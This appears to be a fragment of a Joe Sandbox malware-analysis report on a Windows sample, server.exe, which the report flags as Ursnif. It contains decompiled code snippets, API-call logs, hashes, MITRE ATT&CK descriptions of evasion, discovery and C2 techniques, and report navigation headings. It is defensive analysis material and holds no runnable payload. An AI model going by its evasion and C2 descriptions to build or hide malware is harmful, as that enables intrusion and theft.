				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x047e5df9
0x047e5dfd
0x047e5e07
0x047e5e0c
0x047e5e11
0x047e5e13
0x047e5e1b
0x047e5e20
0x047e5e2e
0x047e5e33
0x047e5e3d

APIs

lstrlenW.KERNEL32(004F0053,?,74655520,00000008,05429270,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DF4
lstrlenW.KERNEL32(047E52D0,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DFB

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

memcpy.NTDLL(00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5E1B
memcpy.NTDLL(746569A0,047E52D0,00000002,00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270), ref: 047E5E2E

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
Instruction ID: 20fd9da3df1830f4887803cf6f41c31171fa48fe9776cb311088cbceae12cc14
Opcode Fuzzy Hash: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
Instruction Fuzzy Hash: 65F04F7290011DBBDF11DFE9CC48CDE7BADEF082587114162ED04D7201E635EA108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 047E7563 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
lstrlen.KERNEL32(?), ref: 047E757B

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
lstrcat.KERNEL32(00000000,?), ref: 047E759A

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
Instruction ID: 34b01fc7b4db0c77e45140fe8a855fa816009c6bf1dddb56ee590de16562fb08
Opcode Fuzzy Hash: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
Instruction Fuzzy Hash: 1CE09BB35016215B87115BA6AC48CAFB76CFF8D6503044916F700D7200D735DD0187A1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report server.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Windows Analysis Report
server.exe

Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Function 047E1508 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Function 047E3BD3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Function 047E421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81
filetimeCOMMON

Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 047E3CE0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON